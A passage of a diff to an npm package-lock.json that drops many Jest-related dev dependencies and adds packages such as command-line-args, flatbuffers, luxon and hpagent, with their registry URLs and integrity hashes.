"^4.1.0", + "supports-color": "^7.1.0" + } }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, + "chalk-template": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/chalk-template/-/chalk-template-0.4.0.tgz", + "integrity": "sha512-/ghrgmhfY8RaSdeo43hNXxpoHAtxdbskUHjPpfqUWGttFgycUhYPGx3YZBCnUCvOa7Doivn1IZec3DEGFoMgLg==", "requires": { - "path-key": "^3.0.0" + "chalk": "^4.1.2" } }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, + "color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "requires": { - "wrappy": "1" + "color-name": "~1.1.4" } }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, + "color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + }, + "command-line-args": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-6.0.1.tgz", + "integrity": "sha512-Jr3eByUjqyK0qd8W0SGFW1nZwqCaNCtbXjRo2cRJC1OYxWl3MZ5t1US3jq+cO4sPavqgw4l9BMGX0CBe+trepg==", "requires": { - "mimic-fn": "^2.1.0" + "array-back": "^6.2.2", + "find-replace": "^5.0.2", + "lodash.camelcase": "^4.3.0", + "typical": "^7.2.0" } }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, + "command-line-usage": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/command-line-usage/-/command-line-usage-7.0.3.tgz", + "integrity": "sha512-PqMLy5+YGwhMh1wS04mVG44oqDsgyLRSKJBdOo1bnYhMKBW65gZF1dRp2OZRhiTjgUHljy99qkO7bsctLaw35Q==", "requires": { - "yocto-queue": "^0.1.0" + "array-back": "^6.2.2", + "chalk-template": "^0.4.0", + "table-layout": "^4.1.0", + "typical": "^7.1.1" } }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, + "debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } + "ms": "^2.1.3" } }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" + "to-regex-range": "^5.0.1" } }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true + "find-replace": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-5.0.2.tgz", + "integrity": "sha512-Y45BAiE3mz2QsrN2fb5QEtO4qb44NcS7en/0y9PEVsg351HsLeVclP8QPMH79Le9sH3rs5RSwJu99W0WPZO43Q==", + "requires": {} }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true + "flatbuffers": { + "version": "24.12.23", + "resolved": "https://registry.npmjs.org/flatbuffers/-/flatbuffers-24.12.23.tgz", + "integrity": "sha512-dLVCAISd5mhls514keQzmEG6QHmUUsNuWsb4tFafIUwvvgDjXhtfAYSKOzt5SWOy+qByV5pbsDZ+Vb7HUOBEdA==" }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", "dev": true }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true + "has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==" }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true + "hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } + "json-bignum": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/json-bignum/-/json-bignum-0.0.3.tgz", + "integrity": "sha512-2WHyXj3OfHSgNyuzDbSxI1w2jgw5gkWSWhS7Qg4bWXx1nLk3jnbwfUeS0PSba3IzpTUWdHxBieELUzXRjQB2zg==" }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true + "lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true + "lodash.camelcase": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", + "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==" }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true + "luxon": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.7.1.tgz", + "integrity": "sha512-RkRWjA926cTvz5rAb1BqyWkKbbjzCGchDUIKMCUvNi17j6f6j8uHGDV82Aqcqtzd+icoYpELmG3ksgGiFNNcNg==" }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", + "micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" + "braces": "^3.0.3", + "picomatch": "^2.3.1" } }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } + "ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dev": true }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", + "react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true }, "secure-json-parse": { @@ -6319,67 +1379,12 @@ "resolved": "https://registry.npmjs.org/secure-json-parse/-/secure-json-parse-3.0.2.tgz", "integrity": "sha512-H6nS2o8bWfpFEV6U38sOSjS7bTbdgbCGU9wEM6W14P5H0QOsz94KCusifV44GpHDTu2nqZbuDNhTzu+mjDSw1w==" }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, "slash": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, "stack-utils": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", @@ -6389,54 +1394,6 @@ "escape-string-regexp": "^2.0.0" } }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, "supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", @@ -6445,12 +1402,6 @@ "has-flag": "^4.0.0" } }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, "table-layout": { "version": "4.1.1", "resolved": "https://registry.npmjs.org/table-layout/-/table-layout-4.1.1.tgz", @@ -6460,29 +1411,6 @@ "wordwrapjs": "^5.1.0" } }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, "to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", @@ -6497,18 +1425,6 @@ "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==" }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, "typical": { "version": "7.3.0", "resolved": "https://registry.npmjs.org/typical/-/typical-7.3.0.tgz", @@ -6524,123 +1440,10 @@ "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==" }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, "wordwrapjs": { "version": "5.1.0", "resolved": "https://registry.npmjs.org/wordwrapjs/-/wordwrapjs-5.1.0.tgz", "integrity": "sha512-JNjcULU2e4KJwUNv6CHgI46UvDGitb6dGryHajXTDiLgg1/RiGoPSDw4kZfYnwGtEXf2ZMeIewDQgFGzkCB2Sg==" - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": 